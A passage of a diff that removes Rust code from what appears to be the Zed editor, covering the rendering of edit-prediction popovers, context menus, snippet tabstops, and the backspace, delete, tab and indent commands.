- .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - let line_origin = self.display_to_pixel_point(target_line_end, editor_snapshot, window)?; - - let start_point = content_origin - point(scroll_pixel_position.x, Pixels::ZERO); - let mut origin = start_point - + line_origin - + point(Self::EDIT_PREDICTION_POPOVER_PADDING_X, Pixels::ZERO); - origin.x = origin.x.max(content_origin.x); - - let max_x = content_origin.x + editor_width - size.width; - - if origin.x > max_x { - let offset = line_height + Self::EDIT_PREDICTION_POPOVER_PADDING_Y; - - let icon = if visible_row_range.contains(&(target_display_point.row() + 2)) { - origin.y += offset; - IconName::ArrowUp - } else { - origin.y -= offset; - IconName::ArrowDown - }; - - element = self - .render_edit_prediction_line_popover(label, Some(icon), window, cx)? - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - origin.x = content_origin.x + editor_width - size.width - px(2.); - } - - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } - - fn render_edit_prediction_diff_popover( - self: &Editor, - text_bounds: &Bounds, - content_origin: gpui::Point, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - line_layouts: &[LineWithInvisibles], - line_height: Pixels, - scroll_pixel_position: gpui::Point, - newest_selection_head: Option, - editor_width: Pixels, - style: &EditorStyle, - edits: &Vec<(Range, String)>, - edit_preview: &Option, - snapshot: &language::BufferSnapshot, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let edit_start = edits - .first() - .unwrap() - .0 - .start - .to_display_point(editor_snapshot); - let edit_end = edits - .last() - .unwrap() - .0 - .end - .to_display_point(editor_snapshot); - - let is_visible = visible_row_range.contains(&edit_start.row()) - || visible_row_range.contains(&edit_end.row()); - if !is_visible { - return None; - } - - 
let highlighted_edits = - crate::inline_completion_edit_text(&snapshot, edits, edit_preview.as_ref()?, false, cx); - - let styled_text = highlighted_edits.to_styled_text(&style.text); - let line_count = highlighted_edits.text.lines().count(); - - const BORDER_WIDTH: Pixels = px(1.); - - let keybind = self.render_edit_prediction_accept_keybind(window, cx); - let has_keybind = keybind.is_some(); - - let mut element = h_flex() - .items_start() - .child( - h_flex() - .bg(cx.theme().colors().editor_background) - .border(BORDER_WIDTH) - .shadow_sm() - .border_color(cx.theme().colors().border) - .rounded_l_lg() - .when(line_count > 1, |el| el.rounded_br_lg()) - .pr_1() - .child(styled_text), - ) - .child( - h_flex() - .h(line_height + BORDER_WIDTH * 2.) - .px_1p5() - .gap_1() - // Workaround: For some reason, there's a gap if we don't do this - .ml(-BORDER_WIDTH) - .shadow(vec![gpui::BoxShadow { - color: gpui::black().opacity(0.05), - offset: point(px(1.), px(1.)), - blur_radius: px(2.), - spread_radius: px(0.), - }]) - .bg(Editor::edit_prediction_line_popover_bg_color(cx)) - .border(BORDER_WIDTH) - .border_color(cx.theme().colors().border) - .rounded_r_lg() - .id("edit_prediction_diff_popover_keybind") - .when(!has_keybind, |el| { - let status_colors = cx.theme().status(); - - el.bg(status_colors.error_background) - .border_color(status_colors.error.opacity(0.6)) - .child(Icon::new(IconName::Info).color(Color::Error)) - .cursor_default() - .hoverable_tooltip(move |_window, cx| { - cx.new(|_| MissingEditPredictionKeybindingTooltip).into() - }) - }) - .children(keybind), - ) - .into_any(); - - let longest_row = - editor_snapshot.longest_row_in_range(edit_start.row()..edit_end.row() + 1); - let longest_line_width = if visible_row_range.contains(&longest_row) { - line_layouts[(longest_row.0 - visible_row_range.start.0) as usize].width - } else { - layout_line( - longest_row, - editor_snapshot, - style, - editor_width, - |_| false, - window, - cx, - ) - .width - }; - - let 
viewport_bounds = - Bounds::new(Default::default(), window.viewport_size()).extend(Edges { - right: -EditorElement::SCROLLBAR_WIDTH, - ..Default::default() - }); - - let x_after_longest = - text_bounds.origin.x + longest_line_width + Self::EDIT_PREDICTION_POPOVER_PADDING_X - - scroll_pixel_position.x; - - let element_bounds = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - // Fully visible if it can be displayed within the window (allow overlapping other - // panes). However, this is only allowed if the popover starts within text_bounds. - let can_position_to_the_right = x_after_longest < text_bounds.right() - && x_after_longest + element_bounds.width < viewport_bounds.right(); - - let mut origin = if can_position_to_the_right { - point( - x_after_longest, - text_bounds.origin.y + edit_start.row().as_f32() * line_height - - scroll_pixel_position.y, - ) - } else { - let cursor_row = newest_selection_head.map(|head| head.row()); - let above_edit = edit_start - .row() - .0 - .checked_sub(line_count as u32) - .map(DisplayRow); - let below_edit = Some(edit_end.row() + 1); - let above_cursor = - cursor_row.and_then(|row| row.0.checked_sub(line_count as u32).map(DisplayRow)); - let below_cursor = cursor_row.map(|cursor_row| cursor_row + 1); - - // Place the edit popover adjacent to the edit if there is a location - // available that is onscreen and does not obscure the cursor. Otherwise, - // place it adjacent to the cursor. 
- let row_target = [above_edit, below_edit, above_cursor, below_cursor] - .into_iter() - .flatten() - .find(|&start_row| { - let end_row = start_row + line_count as u32; - visible_row_range.contains(&start_row) - && visible_row_range.contains(&end_row) - && cursor_row.map_or(true, |cursor_row| { - !((start_row..end_row).contains(&cursor_row)) - }) - })?; - - content_origin - + point( - -scroll_pixel_position.x, - row_target.as_f32() * line_height - scroll_pixel_position.y, - ) - }; - - origin.x -= BORDER_WIDTH; - - window.defer_draw(element, origin, 1); - - // Do not return an element, since it will already be drawn due to defer_draw. - None - } - - fn edit_prediction_cursor_popover_height(&self) -> Pixels { - px(30.) - } - - fn current_user_player_color(&self, cx: &mut App) -> PlayerColor { - if self.read_only(cx) { - cx.theme().players().read_only() - } else { - self.style.as_ref().unwrap().local_player - } - } - - fn render_edit_prediction_accept_keybind( - &self, - window: &mut Window, - cx: &App, - ) -> Option { - let accept_binding = self.accept_edit_prediction_keybind(window, cx); - let accept_keystroke = accept_binding.keystroke()?; - - let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; - - let modifiers_color = if accept_keystroke.modifiers == window.modifiers() { - Color::Accent - } else { - Color::Muted - }; - - h_flex() - .px_0p5() - .when(is_platform_style_mac, |parent| parent.gap_0p5()) - .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) - .text_size(TextSize::XSmall.rems(cx)) - .child(h_flex().children(ui::render_modifiers( - &accept_keystroke.modifiers, - PlatformStyle::platform(), - Some(modifiers_color), - Some(IconSize::XSmall.rems().into()), - true, - ))) - .when(is_platform_style_mac, |parent| { - parent.child(accept_keystroke.key.clone()) - }) - .when(!is_platform_style_mac, |parent| { - parent.child( - Key::new( - util::capitalize(&accept_keystroke.key), - Some(Color::Default), - ) - 
.size(Some(IconSize::XSmall.rems().into())), - ) - }) - .into_any() - .into() - } - - fn render_edit_prediction_line_popover( - &self, - label: impl Into, - icon: Option, - window: &mut Window, - cx: &App, - ) -> Option> { - let padding_right = if icon.is_some() { px(4.) } else { px(8.) }; - - let keybind = self.render_edit_prediction_accept_keybind(window, cx); - let has_keybind = keybind.is_some(); - - let result = h_flex() - .id("ep-line-popover") - .py_0p5() - .pl_1() - .pr(padding_right) - .gap_1() - .rounded_md() - .border_1() - .bg(Self::edit_prediction_line_popover_bg_color(cx)) - .border_color(Self::edit_prediction_callout_popover_border_color(cx)) - .shadow_sm() - .when(!has_keybind, |el| { - let status_colors = cx.theme().status(); - - el.bg(status_colors.error_background) - .border_color(status_colors.error.opacity(0.6)) - .pl_2() - .child(Icon::new(IconName::ZedPredictError).color(Color::Error)) - .cursor_default() - .hoverable_tooltip(move |_window, cx| { - cx.new(|_| MissingEditPredictionKeybindingTooltip).into() - }) - }) - .children(keybind) - .child( - Label::new(label) - .size(LabelSize::Small) - .when(!has_keybind, |el| { - el.color(cx.theme().status().error.into()).strikethrough() - }), - ) - .when(!has_keybind, |el| { - el.child( - h_flex().ml_1().child( - Icon::new(IconName::Info) - .size(IconSize::Small) - .color(cx.theme().status().error.into()), - ), - ) - }) - .when_some(icon, |element, icon| { - element.child( - div() - .mt(px(1.5)) - .child(Icon::new(icon).size(IconSize::Small)), - ) - }); - - Some(result) - } - - fn edit_prediction_line_popover_bg_color(cx: &App) -> Hsla { - let accent_color = cx.theme().colors().text_accent; - let editor_bg_color = cx.theme().colors().editor_background; - editor_bg_color.blend(accent_color.opacity(0.1)) - } - - fn edit_prediction_callout_popover_border_color(cx: &App) -> Hsla { - let accent_color = cx.theme().colors().text_accent; - let editor_bg_color = cx.theme().colors().editor_background; - 
editor_bg_color.blend(accent_color.opacity(0.6)) - } - - fn render_edit_prediction_cursor_popover( - &self, - min_width: Pixels, - max_width: Pixels, - cursor_point: Point, - style: &EditorStyle, - accept_keystroke: Option<&gpui::Keystroke>, - _window: &Window, - cx: &mut Context, - ) -> Option { - let provider = self.edit_prediction_provider.as_ref()?; - - if provider.provider.needs_terms_acceptance(cx) { - return Some( - h_flex() - .min_w(min_width) - .flex_1() - .px_2() - .py_1() - .gap_3() - .elevation_2(cx) - .hover(|style| style.bg(cx.theme().colors().element_hover)) - .id("accept-terms") - .cursor_pointer() - .on_mouse_down(MouseButton::Left, |_, window, _| window.prevent_default()) - .on_click(cx.listener(|this, _event, window, cx| { - cx.stop_propagation(); - this.report_editor_event("Edit Prediction Provider ToS Clicked", None, cx); - window.dispatch_action( - zed_actions::OpenZedPredictOnboarding.boxed_clone(), - cx, - ); - })) - .child( - h_flex() - .flex_1() - .gap_2() - .child(Icon::new(IconName::ZedPredict)) - .child(Label::new("Accept Terms of Service")) - .child(div().w_full()) - .child( - Icon::new(IconName::ArrowUpRight) - .color(Color::Muted) - .size(IconSize::Small), - ) - .into_any_element(), - ) - .into_any(), - ); - } - - let is_refreshing = provider.provider.is_refreshing(cx); - - fn pending_completion_container() -> Div { - h_flex() - .h_full() - .flex_1() - .gap_2() - .child(Icon::new(IconName::ZedPredict)) - } - - let completion = match &self.active_inline_completion { - Some(prediction) => { - if !self.has_visible_completions_menu() { - const RADIUS: Pixels = px(6.); - const BORDER_WIDTH: Pixels = px(1.); - - return Some( - h_flex() - .elevation_2(cx) - .border(BORDER_WIDTH) - .border_color(cx.theme().colors().border) - .when(accept_keystroke.is_none(), |el| { - el.border_color(cx.theme().status().error) - }) - .rounded(RADIUS) - .rounded_tl(px(0.)) - .overflow_hidden() - .child(div().px_1p5().child(match &prediction.completion { - 
InlineCompletion::Move { target, snapshot } => { - use text::ToPoint as _; - if target.text_anchor.to_point(&snapshot).row > cursor_point.row - { - Icon::new(IconName::ZedPredictDown) - } else { - Icon::new(IconName::ZedPredictUp) - } - } - InlineCompletion::Edit { .. } => Icon::new(IconName::ZedPredict), - })) - .child( - h_flex() - .gap_1() - .py_1() - .px_2() - .rounded_r(RADIUS - BORDER_WIDTH) - .border_l_1() - .border_color(cx.theme().colors().border) - .bg(Self::edit_prediction_line_popover_bg_color(cx)) - .when(self.edit_prediction_preview.released_too_fast(), |el| { - el.child( - Label::new("Hold") - .size(LabelSize::Small) - .when(accept_keystroke.is_none(), |el| { - el.strikethrough() - }) - .line_height_style(LineHeightStyle::UiLabel), - ) - }) - .id("edit_prediction_cursor_popover_keybind") - .when(accept_keystroke.is_none(), |el| { - let status_colors = cx.theme().status(); - - el.bg(status_colors.error_background) - .border_color(status_colors.error.opacity(0.6)) - .child(Icon::new(IconName::Info).color(Color::Error)) - .cursor_default() - .hoverable_tooltip(move |_window, cx| { - cx.new(|_| MissingEditPredictionKeybindingTooltip) - .into() - }) - }) - .when_some( - accept_keystroke.as_ref(), - |el, accept_keystroke| { - el.child(h_flex().children(ui::render_modifiers( - &accept_keystroke.modifiers, - PlatformStyle::platform(), - Some(Color::Default), - Some(IconSize::XSmall.rems().into()), - false, - ))) - }, - ), - ) - .into_any(), - ); - } - - self.render_edit_prediction_cursor_popover_preview( - prediction, - cursor_point, - style, - cx, - )? 
- } - - None if is_refreshing => match &self.stale_inline_completion_in_menu { - Some(stale_completion) => self.render_edit_prediction_cursor_popover_preview( - stale_completion, - cursor_point, - style, - cx, - )?, - - None => { - pending_completion_container().child(Label::new("...").size(LabelSize::Small)) - } - }, - - None => pending_completion_container().child(Label::new("No Prediction")), - }; - - let completion = if is_refreshing { - completion - .with_animation( - "loading-completion", - Animation::new(Duration::from_secs(2)) - .repeat() - .with_easing(pulsating_between(0.4, 0.8)), - |label, delta| label.opacity(delta), - ) - .into_any_element() - } else { - completion.into_any_element() - }; - - let has_completion = self.active_inline_completion.is_some(); - - let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; - Some( - h_flex() - .min_w(min_width) - .max_w(max_width) - .flex_1() - .elevation_2(cx) - .border_color(cx.theme().colors().border) - .child( - div() - .flex_1() - .py_1() - .px_2() - .overflow_hidden() - .child(completion), - ) - .when_some(accept_keystroke, |el, accept_keystroke| { - if !accept_keystroke.modifiers.modified() { - return el; - } - - el.child( - h_flex() - .h_full() - .border_l_1() - .rounded_r_lg() - .border_color(cx.theme().colors().border) - .bg(Self::edit_prediction_line_popover_bg_color(cx)) - .gap_1() - .py_1() - .px_2() - .child( - h_flex() - .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) - .when(is_platform_style_mac, |parent| parent.gap_1()) - .child(h_flex().children(ui::render_modifiers( - &accept_keystroke.modifiers, - PlatformStyle::platform(), - Some(if !has_completion { - Color::Muted - } else { - Color::Default - }), - None, - false, - ))), - ) - .child(Label::new("Preview").into_any_element()) - .opacity(if has_completion { 1.0 } else { 0.4 }), - ) - }) - .into_any(), - ) - } - - fn render_edit_prediction_cursor_popover_preview( - &self, - completion: 
&InlineCompletionState, - cursor_point: Point, - style: &EditorStyle, - cx: &mut Context, - ) -> Option
{ - use text::ToPoint as _; - - fn render_relative_row_jump( - prefix: impl Into, - current_row: u32, - target_row: u32, - ) -> Div { - let (row_diff, arrow) = if target_row < current_row { - (current_row - target_row, IconName::ArrowUp) - } else { - (target_row - current_row, IconName::ArrowDown) - }; - - h_flex() - .child( - Label::new(format!("{}{}", prefix.into(), row_diff)) - .color(Color::Muted) - .size(LabelSize::Small), - ) - .child(Icon::new(arrow).color(Color::Muted).size(IconSize::Small)) - } - - match &completion.completion { - InlineCompletion::Move { - target, snapshot, .. - } => Some( - h_flex() - .px_2() - .gap_2() - .flex_1() - .child( - if target.text_anchor.to_point(&snapshot).row > cursor_point.row { - Icon::new(IconName::ZedPredictDown) - } else { - Icon::new(IconName::ZedPredictUp) - }, - ) - .child(Label::new("Jump to Edit")), - ), - - InlineCompletion::Edit { - edits, - edit_preview, - snapshot, - display_mode: _, - } => { - let first_edit_row = edits.first()?.0.start.text_anchor.to_point(&snapshot).row; - - let (highlighted_edits, has_more_lines) = crate::inline_completion_edit_text( - &snapshot, - &edits, - edit_preview.as_ref()?, - true, - cx, - ) - .first_line_preview(); - - let styled_text = gpui::StyledText::new(highlighted_edits.text) - .with_default_highlights(&style.text, highlighted_edits.highlights); - - let preview = h_flex() - .gap_1() - .min_w_16() - .child(styled_text) - .when(has_more_lines, |parent| parent.child("…")); - - let left = if first_edit_row != cursor_point.row { - render_relative_row_jump("", cursor_point.row, first_edit_row) - .into_any_element() - } else { - Icon::new(IconName::ZedPredict).into_any_element() - }; - - Some( - h_flex() - .h_full() - .flex_1() - .gap_2() - .pr_1() - .overflow_x_hidden() - .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) - .child(left) - .child(preview), - ) - } - } - } - - fn render_context_menu( - &self, - style: &EditorStyle, - max_height_in_lines: u32, - 
window: &mut Window, - cx: &mut Context, - ) -> Option { - let menu = self.context_menu.borrow(); - let menu = menu.as_ref()?; - if !menu.visible() { - return None; - }; - Some(menu.render(style, max_height_in_lines, window, cx)) - } - - fn render_context_menu_aside( - &mut self, - max_size: Size, - window: &mut Window, - cx: &mut Context, - ) -> Option { - self.context_menu.borrow_mut().as_mut().and_then(|menu| { - if menu.visible() { - menu.render_aside(self, max_size, window, cx) - } else { - None - } - }) - } - - fn hide_context_menu( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> Option { - cx.notify(); - self.completion_tasks.clear(); - let context_menu = self.context_menu.borrow_mut().take(); - self.stale_inline_completion_in_menu.take(); - self.update_visible_inline_completion(window, cx); - context_menu - } - - fn show_snippet_choices( - &mut self, - choices: &Vec, - selection: Range, - cx: &mut Context, - ) { - if selection.start.buffer_id.is_none() { - return; - } - let buffer_id = selection.start.buffer_id.unwrap(); - let buffer = self.buffer().read(cx).buffer(buffer_id); - let id = post_inc(&mut self.next_completion_id); - let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; - - if let Some(buffer) = buffer { - *self.context_menu.borrow_mut() = Some(CodeContextMenu::Completions( - CompletionsMenu::new_snippet_choices( - id, - true, - choices, - selection, - buffer, - snippet_sort_order, - ), - )); - } - } - - pub fn insert_snippet( - &mut self, - insertion_ranges: &[Range], - snippet: Snippet, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - struct Tabstop { - is_end_tabstop: bool, - ranges: Vec>, - choices: Option>, - } - - let tabstops = self.buffer.update(cx, |buffer, cx| { - let snippet_text: Arc = snippet.text.clone().into(); - let edits = insertion_ranges - .iter() - .cloned() - .map(|range| (range, snippet_text.clone())); - buffer.edit(edits, Some(AutoindentMode::EachLine), cx); - - let 
snapshot = &*buffer.read(cx); - let snippet = &snippet; - snippet - .tabstops - .iter() - .map(|tabstop| { - let is_end_tabstop = tabstop.ranges.first().map_or(false, |tabstop| { - tabstop.is_empty() && tabstop.start == snippet.text.len() as isize - }); - let mut tabstop_ranges = tabstop - .ranges - .iter() - .flat_map(|tabstop_range| { - let mut delta = 0_isize; - insertion_ranges.iter().map(move |insertion_range| { - let insertion_start = insertion_range.start as isize + delta; - delta += - snippet.text.len() as isize - insertion_range.len() as isize; - - let start = ((insertion_start + tabstop_range.start) as usize) - .min(snapshot.len()); - let end = ((insertion_start + tabstop_range.end) as usize) - .min(snapshot.len()); - snapshot.anchor_before(start)..snapshot.anchor_after(end) - }) - }) - .collect::>(); - tabstop_ranges.sort_unstable_by(|a, b| a.start.cmp(&b.start, snapshot)); - - Tabstop { - is_end_tabstop, - ranges: tabstop_ranges, - choices: tabstop.choices.clone(), - } - }) - .collect::>() - }); - if let Some(tabstop) = tabstops.first() { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(tabstop.ranges.iter().cloned()); - }); - - if let Some(choices) = &tabstop.choices { - if let Some(selection) = tabstop.ranges.first() { - self.show_snippet_choices(choices, selection.clone(), cx) - } - } - - // If we're already at the last tabstop and it's at the end of the snippet, - // we're done, we don't need to keep the state around. - if !tabstop.is_end_tabstop { - let choices = tabstops - .iter() - .map(|tabstop| tabstop.choices.clone()) - .collect(); - - let ranges = tabstops - .into_iter() - .map(|tabstop| tabstop.ranges) - .collect::>(); - - self.snippet_stack.push(SnippetState { - active_index: 0, - ranges, - choices, - }); - } - - // Check whether the just-entered snippet ends with an auto-closable bracket. 
- if self.autoclose_regions.is_empty() { - let snapshot = self.buffer.read(cx).snapshot(cx); - for selection in &mut self.selections.all::(cx) { - let selection_head = selection.head(); - let Some(scope) = snapshot.language_scope_at(selection_head) else { - continue; - }; - - let mut bracket_pair = None; - let next_chars = snapshot.chars_at(selection_head).collect::(); - let prev_chars = snapshot - .reversed_chars_at(selection_head) - .collect::(); - for (pair, enabled) in scope.brackets() { - if enabled - && pair.close - && prev_chars.starts_with(pair.start.as_str()) - && next_chars.starts_with(pair.end.as_str()) - { - bracket_pair = Some(pair.clone()); - break; - } - } - if let Some(pair) = bracket_pair { - let snapshot_settings = snapshot.language_settings_at(selection_head, cx); - let autoclose_enabled = - self.use_autoclose && snapshot_settings.use_autoclose; - if autoclose_enabled { - let start = snapshot.anchor_after(selection_head); - let end = snapshot.anchor_after(selection_head); - self.autoclose_regions.push(AutocloseRegion { - selection_id: selection.id, - range: start..end, - pair, - }); - } - } - } - } - } - Ok(()) - } - - pub fn move_to_next_snippet_tabstop( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> bool { - self.move_to_snippet_tabstop(Bias::Right, window, cx) - } - - pub fn move_to_prev_snippet_tabstop( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> bool { - self.move_to_snippet_tabstop(Bias::Left, window, cx) - } - - pub fn move_to_snippet_tabstop( - &mut self, - bias: Bias, - window: &mut Window, - cx: &mut Context, - ) -> bool { - if let Some(mut snippet) = self.snippet_stack.pop() { - match bias { - Bias::Left => { - if snippet.active_index > 0 { - snippet.active_index -= 1; - } else { - self.snippet_stack.push(snippet); - return false; - } - } - Bias::Right => { - if snippet.active_index + 1 < snippet.ranges.len() { - snippet.active_index += 1; - } else { - self.snippet_stack.push(snippet); - return false; 
- } - } - } - if let Some(current_ranges) = snippet.ranges.get(snippet.active_index) { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_anchor_ranges(current_ranges.iter().cloned()) - }); - - if let Some(choices) = &snippet.choices[snippet.active_index] { - if let Some(selection) = current_ranges.first() { - self.show_snippet_choices(&choices, selection.clone(), cx); - } - } - - // If snippet state is not at the last tabstop, push it back on the stack - if snippet.active_index + 1 < snippet.ranges.len() { - self.snippet_stack.push(snippet); - } - return true; - } - } - - false - } - - pub fn clear(&mut self, window: &mut Window, cx: &mut Context) { - self.transact(window, cx, |this, window, cx| { - this.select_all(&SelectAll, window, cx); - this.insert("", window, cx); - }); - } - - pub fn backspace(&mut self, _: &Backspace, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_autoclose_pair(window, cx); - let mut linked_ranges = HashMap::<_, Vec<_>>::default(); - if !this.linked_edit_ranges.is_empty() { - let selections = this.selections.all::(cx); - let snapshot = this.buffer.read(cx).snapshot(cx); - - for selection in selections.iter() { - let selection_start = snapshot.anchor_before(selection.start).text_anchor; - let selection_end = snapshot.anchor_after(selection.end).text_anchor; - if selection_start.buffer_id != selection_end.buffer_id { - continue; - } - if let Some(ranges) = - this.linked_editing_ranges_for(selection_start..selection_end, cx) - { - for (buffer, entries) in ranges { - linked_ranges.entry(buffer).or_default().extend(entries); - } - } - } - } - - let mut selections = this.selections.all::(cx); - let display_map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); - for selection in &mut selections { - if selection.is_empty() { - let old_head = selection.head(); - let mut new_head = - 
movement::left(&display_map, old_head.to_display_point(&display_map)) - .to_point(&display_map); - if let Some((buffer, line_buffer_range)) = display_map - .buffer_snapshot - .buffer_line_for_row(MultiBufferRow(old_head.row)) - { - let indent_size = buffer.indent_size_for_line(line_buffer_range.start.row); - let indent_len = match indent_size.kind { - IndentKind::Space => { - buffer.settings_at(line_buffer_range.start, cx).tab_size - } - IndentKind::Tab => NonZeroU32::new(1).unwrap(), - }; - if old_head.column <= indent_size.len && old_head.column > 0 { - let indent_len = indent_len.get(); - new_head = cmp::min( - new_head, - MultiBufferPoint::new( - old_head.row, - ((old_head.column - 1) / indent_len) * indent_len, - ), - ); - } - } - - selection.set_head(new_head, SelectionGoal::None); - } - } - - this.signature_help_state.set_backspace_pressed(true); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - this.insert("", window, cx); - let empty_str: Arc = Arc::from(""); - for (buffer, edits) in linked_ranges { - let snapshot = buffer.read(cx).snapshot(); - use text::ToPoint as TP; - - let edits = edits - .into_iter() - .map(|range| { - let end_point = TP::to_point(&range.end, &snapshot); - let mut start_point = TP::to_point(&range.start, &snapshot); - - if end_point == start_point { - let offset = text::ToOffset::to_offset(&range.start, &snapshot) - .saturating_sub(1); - start_point = - snapshot.clip_point(TP::to_point(&offset, &snapshot), Bias::Left); - }; - - (start_point..end_point, empty_str.clone()) - }) - .sorted_by_key(|(range, _)| range.start) - .collect::>(); - buffer.update(cx, |this, cx| { - this.edit(edits, None, cx); - }) - } - this.refresh_inline_completion(true, false, window, cx); - linked_editing_ranges::refresh_linked_ranges(this, window, cx); - }); - } - - pub fn delete(&mut self, _: &Delete, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - 
self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = movement::right(map, selection.head()); - selection.end = cursor; - selection.reversed = true; - selection.goal = SelectionGoal::None; - } - }) - }); - this.insert("", window, cx); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn backtab(&mut self, _: &Backtab, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - if self.move_to_prev_snippet_tabstop(window, cx) { - return; - } - self.outdent(&Outdent, window, cx); - } - - pub fn tab(&mut self, _: &Tab, window: &mut Window, cx: &mut Context) { - if self.move_to_next_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - return; - } - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let mut selections = self.selections.all_adjusted(cx); - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - let rows_iter = selections.iter().map(|s| s.head().row); - let suggested_indents = snapshot.suggested_indents(rows_iter, cx); - - let has_some_cursor_in_whitespace = selections - .iter() - .filter(|selection| selection.is_empty()) - .any(|selection| { - let cursor = selection.head(); - let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); - cursor.column < current_indent.len - }); - - let mut edits = Vec::new(); - let mut prev_edited_row = 0; - let mut row_delta = 0; - for selection in &mut selections { - if selection.start.row != prev_edited_row { - row_delta = 0; - } - prev_edited_row = selection.end.row; - - // If the selection is non-empty, then increase the indentation of the selected lines. 
- if !selection.is_empty() { - row_delta = - Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); - continue; - } - - // If the selection is empty and the cursor is in the leading whitespace before the - // suggested indentation, then auto-indent the line. - let cursor = selection.head(); - let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); - if let Some(suggested_indent) = - suggested_indents.get(&MultiBufferRow(cursor.row)).copied() - { - // If there exist any empty selection in the leading whitespace, then skip - // indent for selections at the boundary. - if has_some_cursor_in_whitespace - && cursor.column == current_indent.len - && current_indent.len == suggested_indent.len - { - continue; - } - - if cursor.column < suggested_indent.len - && cursor.column <= current_indent.len - && current_indent.len <= suggested_indent.len - { - selection.start = Point::new(cursor.row, suggested_indent.len); - selection.end = selection.start; - if row_delta == 0 { - edits.extend(Buffer::edit_for_indent_size_adjustment( - cursor.row, - current_indent, - suggested_indent, - )); - row_delta = suggested_indent.len - current_indent.len; - } - continue; - } - } - - // Otherwise, insert a hard or soft tab. 
- let settings = buffer.language_settings_at(cursor, cx); - let tab_size = if settings.hard_tabs { - IndentSize::tab() - } else { - let tab_size = settings.tab_size.get(); - let indent_remainder = snapshot - .text_for_range(Point::new(cursor.row, 0)..cursor) - .flat_map(str::chars) - .fold(row_delta % tab_size, |counter: u32, c| { - if c == '\t' { - 0 - } else { - (counter + 1) % tab_size - } - }); - - let chars_to_next_tab_stop = tab_size - indent_remainder; - IndentSize::spaces(chars_to_next_tab_stop) - }; - selection.start = Point::new(cursor.row, cursor.column + row_delta + tab_size.len); - selection.end = selection.start; - edits.push((cursor..cursor, tab_size.chars().collect::())); - row_delta += tab_size.len; - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn indent(&mut self, _: &Indent, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let mut selections = self.selections.all::(cx); - let mut prev_edited_row = 0; - let mut row_delta = 0; - let mut edits = Vec::new(); - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - for selection in &mut selections { - if selection.start.row != prev_edited_row { - row_delta = 0; - } - prev_edited_row = selection.end.row; - - row_delta = - Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - }); - } - - fn indent_selection( - buffer: &MultiBuffer, - snapshot: &MultiBufferSnapshot, - selection: &mut Selection, - edits: &mut 
Vec<(Range, String)>, - delta_for_start_row: u32, - cx: &App, - ) -> u32 { - let settings = buffer.language_settings_at(selection.start, cx); - let tab_size = settings.tab_size.get(); - let indent_kind = if settings.hard_tabs { - IndentKind::Tab - } else { - IndentKind::Space - }; - let mut start_row = selection.start.row; - let mut end_row = selection.end.row + 1; - - // If a selection ends at the beginning of a line, don't indent - // that last line. - if selection.end.column == 0 && selection.end.row > selection.start.row { - end_row -= 1; - } - - // Avoid re-indenting a row that has already been indented by a - // previous selection, but still update this selection's column - // to reflect that indentation. - if delta_for_start_row > 0 { - start_row += 1; - selection.start.column += delta_for_start_row; - if selection.end.row == selection.start.row { - selection.end.column += delta_for_start_row; - } - } - - let mut delta_for_end_row = 0; - let has_multiple_rows = start_row + 1 != end_row; - for row in start_row..end_row { - let current_indent = snapshot.indent_size_for_line(MultiBufferRow(row)); - let indent_delta = match (current_indent.kind, indent_kind) { - (IndentKind::Space, IndentKind::Space) => { - let columns_to_next_tab_stop = tab_size - (current_indent.len % tab_size); - IndentSize::spaces(columns_to_next_tab_stop) - } - (IndentKind::Tab, IndentKind::Space) => IndentSize::spaces(tab_size), - (_, IndentKind::Tab) => IndentSize::tab(), - }; - - let start = if has_multiple_rows || current_indent.len < selection.start.column { - 0 - } else { - selection.start.column - }; - let row_start = Point::new(row, start); - edits.push(( - row_start..row_start, - 